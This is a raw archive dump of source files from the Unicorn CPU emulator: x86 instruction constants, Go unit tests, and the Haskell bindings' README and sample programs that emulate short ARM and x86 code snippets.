X86_INS_VINSERTI32X4 = 906 X86_INS_VINSERTI32X8 = 907 X86_INS_VINSERTI64X2 = 908 X86_INS_VINSERTI64X4 = 909 X86_INS_VINSERTPS = 910 X86_INS_VLDDQU = 911 X86_INS_VLDMXCSR = 912 X86_INS_VMASKMOVDQU = 913 X86_INS_VMASKMOVPD = 914 X86_INS_VMASKMOVPS = 915 X86_INS_VMAXPD = 916 X86_INS_VMAXPS = 917 X86_INS_VMAXSD = 918 X86_INS_VMAXSS = 919 X86_INS_VMCALL = 920 X86_INS_VMCLEAR = 921 X86_INS_VMFUNC = 922 X86_INS_VMINPD = 923 X86_INS_VMINPS = 924 X86_INS_VMINSD = 925 X86_INS_VMINSS = 926 X86_INS_VMLAUNCH = 927 X86_INS_VMLOAD = 928 X86_INS_VMMCALL = 929 X86_INS_VMOVQ = 930 X86_INS_VMOVDDUP = 931 X86_INS_VMOVD = 932 X86_INS_VMOVDQA32 = 933 X86_INS_VMOVDQA64 = 934 X86_INS_VMOVDQA = 935 X86_INS_VMOVDQU16 = 936 X86_INS_VMOVDQU32 = 937 X86_INS_VMOVDQU64 = 938 X86_INS_VMOVDQU8 = 939 X86_INS_VMOVDQU = 940 X86_INS_VMOVHLPS = 941 X86_INS_VMOVHPD = 942 X86_INS_VMOVHPS = 943 X86_INS_VMOVLHPS = 944 X86_INS_VMOVLPD = 945 X86_INS_VMOVLPS = 946 X86_INS_VMOVMSKPD = 947 X86_INS_VMOVMSKPS = 948 X86_INS_VMOVNTDQA = 949 X86_INS_VMOVNTDQ = 950 X86_INS_VMOVNTPD = 951 X86_INS_VMOVNTPS = 952 X86_INS_VMOVSD = 953 X86_INS_VMOVSHDUP = 954 X86_INS_VMOVSLDUP = 955 X86_INS_VMOVSS = 956 X86_INS_VMOVUPD = 957 X86_INS_VMOVUPS = 958 X86_INS_VMPSADBW = 959 X86_INS_VMPTRLD = 960 X86_INS_VMPTRST = 961 X86_INS_VMREAD = 962 X86_INS_VMRESUME = 963 X86_INS_VMRUN = 964 X86_INS_VMSAVE = 965 X86_INS_VMULPD = 966 X86_INS_VMULPS = 967 X86_INS_VMULSD = 968 X86_INS_VMULSS = 969 X86_INS_VMWRITE = 970 X86_INS_VMXOFF = 971 X86_INS_VMXON = 972 X86_INS_VPABSB = 973 X86_INS_VPABSD = 974 X86_INS_VPABSQ = 975 X86_INS_VPABSW = 976 X86_INS_VPACKSSDW = 977 X86_INS_VPACKSSWB = 978 X86_INS_VPACKUSDW = 979 X86_INS_VPACKUSWB = 980 X86_INS_VPADDB = 981 X86_INS_VPADDD = 982 X86_INS_VPADDQ = 983 X86_INS_VPADDSB = 984 X86_INS_VPADDSW = 985 X86_INS_VPADDUSB = 986 X86_INS_VPADDUSW = 987 X86_INS_VPADDW = 988 X86_INS_VPALIGNR = 989 X86_INS_VPANDD = 990 X86_INS_VPANDND = 991 X86_INS_VPANDNQ = 992 X86_INS_VPANDN = 993 X86_INS_VPANDQ = 994 X86_INS_VPAND = 995 X86_INS_VPAVGB = 996 X86_INS_VPAVGW = 997 X86_INS_VPBLENDD = 998 X86_INS_VPBLENDMB = 999 X86_INS_VPBLENDMD = 1000 X86_INS_VPBLENDMQ = 1001 X86_INS_VPBLENDMW = 1002 X86_INS_VPBLENDVB = 1003 X86_INS_VPBLENDW = 1004 X86_INS_VPBROADCASTB = 1005 X86_INS_VPBROADCASTD = 1006 X86_INS_VPBROADCASTMB2Q = 1007 X86_INS_VPBROADCASTMW2D = 1008 X86_INS_VPBROADCASTQ = 1009 X86_INS_VPBROADCASTW = 1010 X86_INS_VPCLMULQDQ = 1011 X86_INS_VPCMOV = 1012 X86_INS_VPCMPB = 1013 X86_INS_VPCMPD = 1014 X86_INS_VPCMPEQB = 1015 X86_INS_VPCMPEQD = 1016 X86_INS_VPCMPEQQ = 1017 X86_INS_VPCMPEQW = 1018 X86_INS_VPCMPESTRI = 1019 X86_INS_VPCMPESTRM = 1020 X86_INS_VPCMPGTB = 1021 X86_INS_VPCMPGTD = 1022 X86_INS_VPCMPGTQ = 1023 X86_INS_VPCMPGTW = 1024 X86_INS_VPCMPISTRI = 1025 X86_INS_VPCMPISTRM = 1026 X86_INS_VPCMPQ = 1027 X86_INS_VPCMPUB = 1028 X86_INS_VPCMPUD = 1029 X86_INS_VPCMPUQ = 1030 X86_INS_VPCMPUW = 1031 X86_INS_VPCMPW = 1032 X86_INS_VPCOMB = 1033 X86_INS_VPCOMD = 1034 X86_INS_VPCOMPRESSD = 1035 X86_INS_VPCOMPRESSQ = 1036 X86_INS_VPCOMQ = 1037 X86_INS_VPCOMUB = 1038 X86_INS_VPCOMUD = 1039 X86_INS_VPCOMUQ = 1040 X86_INS_VPCOMUW = 1041 X86_INS_VPCOMW = 1042 X86_INS_VPCONFLICTD = 1043 X86_INS_VPCONFLICTQ = 1044 X86_INS_VPERM2F128 = 1045 X86_INS_VPERM2I128 = 1046 X86_INS_VPERMD = 1047 X86_INS_VPERMI2D = 1048 X86_INS_VPERMI2PD = 1049 X86_INS_VPERMI2PS = 1050 X86_INS_VPERMI2Q = 1051 X86_INS_VPERMIL2PD = 1052 X86_INS_VPERMIL2PS = 1053 X86_INS_VPERMILPD = 1054 X86_INS_VPERMILPS = 1055 X86_INS_VPERMPD = 1056 X86_INS_VPERMPS = 1057 X86_INS_VPERMQ = 1058 X86_INS_VPERMT2D = 1059 X86_INS_VPERMT2PD = 1060 X86_INS_VPERMT2PS = 1061 X86_INS_VPERMT2Q = 1062 X86_INS_VPEXPANDD = 1063 X86_INS_VPEXPANDQ = 1064 X86_INS_VPEXTRB = 1065 X86_INS_VPEXTRD = 1066 X86_INS_VPEXTRQ = 1067 X86_INS_VPEXTRW = 1068 X86_INS_VPGATHERDD = 1069 X86_INS_VPGATHERDQ = 1070 X86_INS_VPGATHERQD = 1071 X86_INS_VPGATHERQQ = 1072 X86_INS_VPHADDBD = 1073 X86_INS_VPHADDBQ = 1074 X86_INS_VPHADDBW = 1075 X86_INS_VPHADDDQ = 1076 X86_INS_VPHADDD = 1077 X86_INS_VPHADDSW = 1078 X86_INS_VPHADDUBD = 1079 X86_INS_VPHADDUBQ = 1080 X86_INS_VPHADDUBW = 1081 X86_INS_VPHADDUDQ = 1082 X86_INS_VPHADDUWD = 1083 X86_INS_VPHADDUWQ = 1084 X86_INS_VPHADDWD = 1085 X86_INS_VPHADDWQ = 1086 X86_INS_VPHADDW = 1087 X86_INS_VPHMINPOSUW = 1088 X86_INS_VPHSUBBW = 1089 X86_INS_VPHSUBDQ = 1090 X86_INS_VPHSUBD = 1091 X86_INS_VPHSUBSW = 1092 X86_INS_VPHSUBWD = 1093 X86_INS_VPHSUBW = 1094 X86_INS_VPINSRB = 1095 X86_INS_VPINSRD = 1096 X86_INS_VPINSRQ = 1097 X86_INS_VPINSRW = 1098 X86_INS_VPLZCNTD = 1099 X86_INS_VPLZCNTQ = 1100 X86_INS_VPMACSDD = 1101 X86_INS_VPMACSDQH = 1102 X86_INS_VPMACSDQL = 1103 X86_INS_VPMACSSDD = 1104 X86_INS_VPMACSSDQH = 1105 X86_INS_VPMACSSDQL = 1106 X86_INS_VPMACSSWD = 1107 X86_INS_VPMACSSWW = 1108 X86_INS_VPMACSWD = 1109 X86_INS_VPMACSWW = 1110 X86_INS_VPMADCSSWD = 1111 X86_INS_VPMADCSWD = 1112 X86_INS_VPMADDUBSW = 1113 X86_INS_VPMADDWD = 1114 X86_INS_VPMASKMOVD = 1115 X86_INS_VPMASKMOVQ = 1116 X86_INS_VPMAXSB = 1117 X86_INS_VPMAXSD = 1118 X86_INS_VPMAXSQ = 1119 X86_INS_VPMAXSW = 1120 X86_INS_VPMAXUB = 1121 X86_INS_VPMAXUD = 1122 X86_INS_VPMAXUQ = 1123 X86_INS_VPMAXUW = 1124 X86_INS_VPMINSB = 1125 X86_INS_VPMINSD = 1126 X86_INS_VPMINSQ = 1127 X86_INS_VPMINSW = 1128 X86_INS_VPMINUB = 1129 X86_INS_VPMINUD = 1130 X86_INS_VPMINUQ = 1131 X86_INS_VPMINUW = 1132 X86_INS_VPMOVDB = 1133 X86_INS_VPMOVDW = 1134 X86_INS_VPMOVM2B = 1135 X86_INS_VPMOVM2D = 1136 X86_INS_VPMOVM2Q = 1137 X86_INS_VPMOVM2W = 1138 X86_INS_VPMOVMSKB = 1139 X86_INS_VPMOVQB = 1140 X86_INS_VPMOVQD = 1141 X86_INS_VPMOVQW = 1142 X86_INS_VPMOVSDB = 1143 X86_INS_VPMOVSDW = 1144 X86_INS_VPMOVSQB = 1145 X86_INS_VPMOVSQD = 1146 X86_INS_VPMOVSQW = 1147 X86_INS_VPMOVSXBD = 1148 X86_INS_VPMOVSXBQ = 1149 X86_INS_VPMOVSXBW = 1150 X86_INS_VPMOVSXDQ = 1151 X86_INS_VPMOVSXWD = 1152 X86_INS_VPMOVSXWQ = 1153 X86_INS_VPMOVUSDB = 1154 X86_INS_VPMOVUSDW = 1155 X86_INS_VPMOVUSQB = 1156 X86_INS_VPMOVUSQD = 1157 X86_INS_VPMOVUSQW = 1158 X86_INS_VPMOVZXBD = 1159 X86_INS_VPMOVZXBQ = 1160 X86_INS_VPMOVZXBW = 1161 X86_INS_VPMOVZXDQ = 1162 X86_INS_VPMOVZXWD = 1163 X86_INS_VPMOVZXWQ = 1164 X86_INS_VPMULDQ = 1165 X86_INS_VPMULHRSW = 1166 X86_INS_VPMULHUW = 1167 X86_INS_VPMULHW = 1168 X86_INS_VPMULLD = 1169 X86_INS_VPMULLQ = 1170 X86_INS_VPMULLW = 1171 X86_INS_VPMULUDQ = 1172 X86_INS_VPORD = 1173 X86_INS_VPORQ = 1174 X86_INS_VPOR = 1175 X86_INS_VPPERM = 1176 X86_INS_VPROTB = 1177 X86_INS_VPROTD = 1178 X86_INS_VPROTQ = 1179 X86_INS_VPROTW = 1180 X86_INS_VPSADBW = 1181 X86_INS_VPSCATTERDD = 1182 X86_INS_VPSCATTERDQ = 1183 X86_INS_VPSCATTERQD = 1184 X86_INS_VPSCATTERQQ = 1185 X86_INS_VPSHAB = 1186 X86_INS_VPSHAD = 1187 X86_INS_VPSHAQ = 1188 X86_INS_VPSHAW = 1189 X86_INS_VPSHLB = 1190 X86_INS_VPSHLD = 1191 X86_INS_VPSHLQ = 1192 X86_INS_VPSHLW = 1193 X86_INS_VPSHUFB = 1194 X86_INS_VPSHUFD = 1195 X86_INS_VPSHUFHW = 1196 X86_INS_VPSHUFLW = 1197 X86_INS_VPSIGNB = 1198 X86_INS_VPSIGND = 1199 X86_INS_VPSIGNW = 1200 X86_INS_VPSLLDQ = 1201 X86_INS_VPSLLD = 1202 X86_INS_VPSLLQ = 1203 X86_INS_VPSLLVD = 1204 X86_INS_VPSLLVQ = 1205 X86_INS_VPSLLW = 1206 X86_INS_VPSRAD = 1207 X86_INS_VPSRAQ = 1208 X86_INS_VPSRAVD = 1209 X86_INS_VPSRAVQ = 1210 X86_INS_VPSRAW = 1211 X86_INS_VPSRLDQ = 1212 X86_INS_VPSRLD = 1213 X86_INS_VPSRLQ = 1214 X86_INS_VPSRLVD = 1215 X86_INS_VPSRLVQ = 1216 X86_INS_VPSRLW = 1217 X86_INS_VPSUBB = 1218 X86_INS_VPSUBD = 1219 X86_INS_VPSUBQ = 1220 X86_INS_VPSUBSB = 1221 X86_INS_VPSUBSW = 1222 X86_INS_VPSUBUSB = 1223 X86_INS_VPSUBUSW = 1224 X86_INS_VPSUBW = 1225 X86_INS_VPTESTMD = 1226 X86_INS_VPTESTMQ = 1227 X86_INS_VPTESTNMD = 1228 X86_INS_VPTESTNMQ = 1229 X86_INS_VPTEST = 1230 X86_INS_VPUNPCKHBW = 1231 X86_INS_VPUNPCKHDQ = 1232 X86_INS_VPUNPCKHQDQ = 1233 X86_INS_VPUNPCKHWD = 1234 X86_INS_VPUNPCKLBW = 1235 X86_INS_VPUNPCKLDQ = 1236 X86_INS_VPUNPCKLQDQ = 1237 X86_INS_VPUNPCKLWD = 1238 X86_INS_VPXORD = 1239 X86_INS_VPXORQ = 1240 X86_INS_VPXOR = 1241 X86_INS_VRCP14PD = 1242 X86_INS_VRCP14PS = 1243 X86_INS_VRCP14SD = 1244 X86_INS_VRCP14SS = 1245 X86_INS_VRCP28PD = 1246 X86_INS_VRCP28PS = 1247 X86_INS_VRCP28SD = 1248 X86_INS_VRCP28SS = 1249 X86_INS_VRCPPS = 1250 X86_INS_VRCPSS = 1251 X86_INS_VRNDSCALEPD = 1252 X86_INS_VRNDSCALEPS = 1253 X86_INS_VRNDSCALESD = 1254 X86_INS_VRNDSCALESS = 1255 X86_INS_VROUNDPD = 1256 X86_INS_VROUNDPS = 1257 X86_INS_VROUNDSD = 1258 X86_INS_VROUNDSS = 1259 X86_INS_VRSQRT14PD = 1260 X86_INS_VRSQRT14PS = 1261 X86_INS_VRSQRT14SD = 1262 X86_INS_VRSQRT14SS = 1263 X86_INS_VRSQRT28PD = 1264 X86_INS_VRSQRT28PS = 1265 X86_INS_VRSQRT28SD = 1266 X86_INS_VRSQRT28SS = 1267 X86_INS_VRSQRTPS = 1268 X86_INS_VRSQRTSS = 1269 X86_INS_VSCATTERDPD = 1270 X86_INS_VSCATTERDPS = 1271 X86_INS_VSCATTERPF0DPD = 1272 X86_INS_VSCATTERPF0DPS = 1273 X86_INS_VSCATTERPF0QPD = 1274 X86_INS_VSCATTERPF0QPS = 1275 X86_INS_VSCATTERPF1DPD = 1276 X86_INS_VSCATTERPF1DPS = 1277 X86_INS_VSCATTERPF1QPD = 1278 X86_INS_VSCATTERPF1QPS = 1279 X86_INS_VSCATTERQPD = 1280 X86_INS_VSCATTERQPS = 1281 X86_INS_VSHUFPD = 1282 X86_INS_VSHUFPS = 1283 X86_INS_VSQRTPD = 1284 X86_INS_VSQRTPS = 1285 X86_INS_VSQRTSD = 1286 X86_INS_VSQRTSS = 1287 X86_INS_VSTMXCSR = 1288 X86_INS_VSUBPD = 1289 X86_INS_VSUBPS = 1290 X86_INS_VSUBSD = 1291 X86_INS_VSUBSS = 1292 X86_INS_VTESTPD = 1293 X86_INS_VTESTPS = 1294 X86_INS_VUNPCKHPD = 1295 X86_INS_VUNPCKHPS = 1296 X86_INS_VUNPCKLPD = 1297 X86_INS_VUNPCKLPS = 1298 X86_INS_VZEROALL = 1299 X86_INS_VZEROUPPER = 1300 X86_INS_WAIT = 1301 X86_INS_WBINVD = 1302 X86_INS_WRFSBASE = 1303 X86_INS_WRGSBASE = 1304 X86_INS_WRMSR = 1305 X86_INS_XABORT = 1306 X86_INS_XACQUIRE = 1307 X86_INS_XBEGIN = 1308 X86_INS_XCHG = 1309 X86_INS_XCRYPTCBC = 1310 X86_INS_XCRYPTCFB = 1311 X86_INS_XCRYPTCTR = 1312 X86_INS_XCRYPTECB = 1313 X86_INS_XCRYPTOFB = 1314 X86_INS_XEND = 1315 X86_INS_XGETBV = 1316 X86_INS_XLATB = 1317 X86_INS_XRELEASE = 1318 X86_INS_XRSTOR = 1319 X86_INS_XRSTOR64 = 1320 X86_INS_XRSTORS = 1321 X86_INS_XRSTORS64 = 1322 X86_INS_XSAVE = 1323 X86_INS_XSAVE64 = 1324 X86_INS_XSAVEC = 1325 X86_INS_XSAVEC64 = 1326 X86_INS_XSAVEOPT = 1327 X86_INS_XSAVEOPT64 = 1328 X86_INS_XSAVES = 1329 X86_INS_XSAVES64 = 1330 X86_INS_XSETBV = 1331 X86_INS_XSHA1 = 1332 X86_INS_XSHA256 = 1333 X86_INS_XSTORE = 1334 X86_INS_XTEST = 1335 X86_INS_FDISI8087_NOP = 1336 X86_INS_FENI8087_NOP = 1337 X86_INS_ENDING = 1338 )unicorn-2.1.1/bindings/go/unicorn/x86_test.go000066400000000000000000000102221467524106700210730ustar00rootroot00000000000000package unicorn import ( "testing" ) var ADDRESS uint64 = 0x1000000 func MakeUc(mode int, code string) (Unicorn, error) { mu, err := NewUnicorn(ARCH_X86, mode) if err != nil { return nil, err } if err := mu.MemMap(ADDRESS, 2*1024*1024); err != nil { return nil, err } if err := mu.MemWrite(ADDRESS, []byte(code)); err != nil { return nil, err } if err := mu.RegWrite(X86_REG_ECX, 0x1234); err != nil { return nil, err } if err := mu.RegWrite(X86_REG_EDX, 0x7890); err != nil { return nil, err } return mu, nil } func TestX86(t *testing.T) { code := "\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { t.Fatal(err) } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1235 || edx != 0x788f { t.Fatal("Bad register values.") } } func TestX86InvalidRead(t *testing.T) { code := "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err.(UcError) != ERR_READ_UNMAPPED { t.Fatal("Expected ERR_READ_INVALID") } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1234 || edx != 0x7890 { t.Fatal("Bad register values.") } } func TestX86InvalidWrite(t *testing.T) { code := "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err.(UcError) != ERR_WRITE_UNMAPPED { t.Fatal("Expected ERR_WRITE_INVALID") } ecx, _ := mu.RegRead(X86_REG_ECX) edx, _ := mu.RegRead(X86_REG_EDX) if ecx != 0x1234 || edx != 0x7890 { t.Fatal("Bad register values.") } } func TestX86InOut(t *testing.T) { code := "\x41\xE4\x3F\x4a\xE6\x46\x43" mu, err := MakeUc(MODE_32, code) if err != nil { t.Fatal(err) } var outVal uint64 var inCalled, outCalled bool mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size uint32) uint32 { inCalled = true switch size { case 1: return 0xf1 case 2: return 0xf2 case 4: return 0xf4 default: return 0 } }, 1, 0, X86_INS_IN) mu.HookAdd(HOOK_INSN, func(_ Unicorn, port, size, value uint32) { outCalled = true var err error switch size { case 1: outVal, err = mu.RegRead(X86_REG_AL) case 2: outVal, err = mu.RegRead(X86_REG_AX) case 4: outVal, err = mu.RegRead(X86_REG_EAX) } if err != nil { t.Fatal(err) } }, 1, 0, X86_INS_OUT) if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { t.Fatal(err) } if !inCalled || !outCalled { t.Fatal("Ports not accessed.") } if outVal != 0xf1 { t.Fatal("Incorrect OUT value.") } } func TestX86Syscall(t *testing.T) { code := "\x0f\x05" mu, err := MakeUc(MODE_64, code) if err != nil { t.Fatal(err) } mu.HookAdd(HOOK_INSN, func(_ Unicorn) { rax, _ := mu.RegRead(X86_REG_RAX) mu.RegWrite(X86_REG_RAX, rax+1) }, 1, 0, X86_INS_SYSCALL) mu.RegWrite(X86_REG_RAX, 0x100) err = mu.Start(ADDRESS, ADDRESS+uint64(len(code))) if err != nil { t.Fatal(err) } v, _ := mu.RegRead(X86_REG_RAX) if v != 0x101 { t.Fatal("Incorrect syscall return value.") } } func TestX86Mmr(t *testing.T) { mu, err := MakeUc(MODE_64, "") if err != nil { t.Fatal(err) } err = mu.RegWriteMmr(X86_REG_GDTR, &X86Mmr{Selector: 0, Base: 0x1000, Limit: 0x1fff, Flags: 0}) if err != nil { t.Fatal(err) } mmr, err := mu.RegReadMmr(X86_REG_GDTR) if mmr.Selector != 0 || mmr.Base != 0x1000 || mmr.Limit != 0x1fff || mmr.Flags != 0 { t.Fatalf("mmr read failed: %#v", mmr) } } func BenchmarkX86Hook(b *testing.B) { // loop rax times code := "\x48\xff\xc8\x48\x83\xf8\x00\x0f\x8f\xf3\xff\xff\xff" mu, err := MakeUc(MODE_64, code) if err != nil { b.Fatal(err) } count := 0 mu.HookAdd(HOOK_CODE, func(_ Unicorn, addr uint64, size uint32) { count++ }, 1, 0) mu.RegWrite(X86_REG_RAX, uint64(b.N)) b.ResetTimer() if err := mu.Start(ADDRESS, ADDRESS+uint64(len(code))); err != nil { b.Fatal(err) } rax, _ := mu.RegRead(X86_REG_RAX) if rax != 0 { b.Errorf("benchmark fell short: rax (%d) != 0", rax) } if count != b.N*3 { b.Fatalf("benchmark fell short: %d < %d", count, b.N) } } unicorn-2.1.1/bindings/haskell/000077500000000000000000000000001467524106700164245ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/.gitignore000066400000000000000000000003411467524106700204120ustar00rootroot00000000000000dist cabal-dev *.o *.hi *.chi *.chs.h *.dyn_o *.dyn_hi .virtualenv .hpc .hsenv .cabal-sandbox/ cabal.sandbox.config *.prof *.aux *.hp SampleArm SampleArm64 SampleM68k SampleMips SampleSparc SampleX86 Shellcode SampleBatchReg unicorn-2.1.1/bindings/haskell/README.TXT000066400000000000000000000016241467524106700177650ustar00rootroot00000000000000This documentation explains how to install Haskell binding for Unicorn from source. 0. Install the core engine as dependency Follow README in the root directory to compile & install the core. On *nix, this can simply be done by (project root directory): $ sudo ./make.sh install 1. Change directories into the Haskell bindings, build and install $ cd bindings/haskell $ cabal install If you are installing into a sandbox, run `cabal sandbox init` before installing Unicorn's dependencies. If the build fails, install c2hs manually `cabal install c2hs` (note that this will probably also require you to run `cabal install alex` and `cabal install happy` as well). If you are NOT using a sandbox, ensure that `$HOME/.cabal/bin` is on your PATH. To build a sample (after having built and installed the Haskell bindings) $ cd bindings/haskell $ ghc --make samples/SampleArm.hs unicorn-2.1.1/bindings/haskell/Setup.hs000066400000000000000000000000561467524106700200610ustar00rootroot00000000000000import Distribution.Simple main = defaultMain unicorn-2.1.1/bindings/haskell/samples/000077500000000000000000000000001467524106700200705ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/samples/SampleArm.hs000066400000000000000000000076611467524106700223170ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate ARM code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Arm as Arm import Data.Bits import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- mov r0, #0x37; sub r1, r2, r3 armCode :: BS.ByteString armCode = BS.pack [0x37, 0x00, 0xa0, 0xe3, 0x03, 0x10, 0x42, 0xe0] -- sub sp, #0xc thumbCode :: BS.ByteString thumbCode = BS.pack [0x83, 0xb0] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testArm :: IO () testArm = do putStrLn "Emulate ARM code" result <- runEmulator $ do -- Initialize emulator in ARM mode uc <- open ArchArm [ModeArm] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address armCode -- Initialize machine registers regWrite uc Arm.R0 0x1234 regWrite uc Arm.R2 0x6789 regWrite uc Arm.R3 0x3333 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength armCode start uc address (address + codeLen) Nothing Nothing -- Return the results r0 <- regRead uc Arm.R0 r1 <- regRead uc Arm.R1 return (r0, r1) case result of Right (r0, r1) -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> R0 = 0x" ++ showHex r0 putStrLn $ ">>> R1 = 0x" ++ showHex r1 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" testThumb :: IO () testThumb = do putStrLn "Emulate THUMB code" result <- runEmulator $ do -- Initialize emulator in ARM mode uc <- open ArchArm [ModeThumb] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address thumbCode -- Initialize machine registers regWrite uc Arm.Sp 0x1234 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength thumbCode start uc (address .|. 1) (address + codeLen) Nothing Nothing -- Return the results sp <- regRead uc Arm.Sp return sp case result of Right sp -> do -- Now print out some registers putStrLn ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> SP = 0x" ++ showHex sp Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = do testArm putStrLn "==========================" testThumb unicorn-2.1.1/bindings/haskell/samples/SampleArm64.hs000066400000000000000000000046171467524106700224670ustar00rootroot00000000000000-- Sample code to demonstrate how to emulate ARM64 code import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.Arm64 as Arm64 import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) -- Code to be emulated -- -- add x11, x13, x15 armCode :: BS.ByteString armCode = BS.pack [0xab, 0x01, 0x0f, 0x8b] -- Memory address where emulation starts address :: Word64 address = 0x10000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length hookBlock :: BlockHook () hookBlock _ addr size _ = putStrLn $ ">>> Tracing basic block at 0x" ++ showHex addr ++ ", block size = 0x" ++ (maybe "0" showHex size) hookCode :: CodeHook () hookCode _ addr size _ = putStrLn $ ">>> Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) testArm64 :: IO () testArm64 = do putStrLn "Emulate ARM64 code" result <- runEmulator $ do -- Initialize emulator in ARM mode uc <- open ArchArm64 [ModeArm] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address armCode -- Initialize machine registers regWrite uc Arm64.X11 0x1234 regWrite uc Arm64.X13 0x6789 regWrite uc Arm64.X15 0x3333 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing one instruction at address with customized callback codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength armCode start uc address (address + codeLen) Nothing Nothing -- Return the results x11 <- regRead uc Arm64.X11 return x11 case result of Right x11 -> do -- Now print out some registers putStrLn $ ">>> Emulation done. Below is the CPU context" putStrLn $ ">>> X11 = 0x" ++ showHex x11 Left err -> putStrLn $ "Failed with error: " ++ show err ++ " (" ++ strerror err ++ ")" main :: IO () main = testArm64 unicorn-2.1.1/bindings/haskell/samples/SampleBatchReg.hs000066400000000000000000000053231467524106700232500ustar00rootroot00000000000000import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Int import Data.List (intercalate) import Data.Word import qualified Numeric as N (showHex) import System.IO (hPutStrLn, stderr) syscallABI :: [X86.Register] syscallABI = [ X86.Rax , X86.Rdi , X86.Rsi , X86.Rdx , X86.R10 , X86.R8 , X86.R9 ] vals :: [Int64] vals = [ 200 , 10 , 11 , 12 , 13 , 14 , 15 ] ucPerror :: Error -> IO () ucPerror err = hPutStrLn stderr $ "Error " ++ ": " ++ strerror err base :: Word64 base = 0x10000 -- mov rax, 100; mov rdi, 1; mov rsi, 2; mov rdx, 3; mov r10, 4; mov r8, 5; mov r9, 6; syscall code :: BS.ByteString code = BS.pack [ 0x48, 0xc7, 0xc0, 0x64, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc7 , 0x01, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x02, 0x00, 0x00 , 0x00, 0x48, 0xc7, 0xc2, 0x03, 0x00, 0x00, 0x00, 0x49, 0xc7 , 0xc2, 0x04, 0x00, 0x00, 0x00, 0x49, 0xc7, 0xc0, 0x05, 0x00 , 0x00, 0x00, 0x49, 0xc7, 0xc1, 0x06, 0x00, 0x00, 0x00, 0x0f , 0x05 ] -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex i = N.showHex (fromIntegral i :: Word64) "" -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift . putStrLn hookSyscall :: SyscallHook () hookSyscall uc _ = do runEmulator $ do readVals <- regReadBatch uc syscallABI emuPutStrLn $ "syscall: {" ++ intercalate ", " (map show readVals) ++ "}" return () hookCode :: CodeHook () hookCode _ addr size _ = do putStrLn $ "HOOK_CODE: 0x" ++ showHex addr ++ ", 0x" ++ maybe "0" showHex size main :: IO () main = do result <- runEmulator $ do uc <- open ArchX86 [Mode64] -- regWriteBatch emuPutStrLn "regWriteBatch {200, 10, 11, 12, 13, 14, 15}" regWriteBatch uc syscallABI vals readVals <- regReadBatch uc syscallABI emuPutStrLn $ "regReadBatch = {" ++ intercalate ", " (map show readVals) ++ "}" -- syscall emuPutStrLn "running syscall shellcode" syscallHookAdd uc hookSyscall () 1 0 memMap uc base (0x1000) [ProtAll] memWrite uc base code let codeLen = fromIntegral $ BS.length code start uc base (base + codeLen) Nothing Nothing case result of Right _ -> return () Left err -> ucPerror err 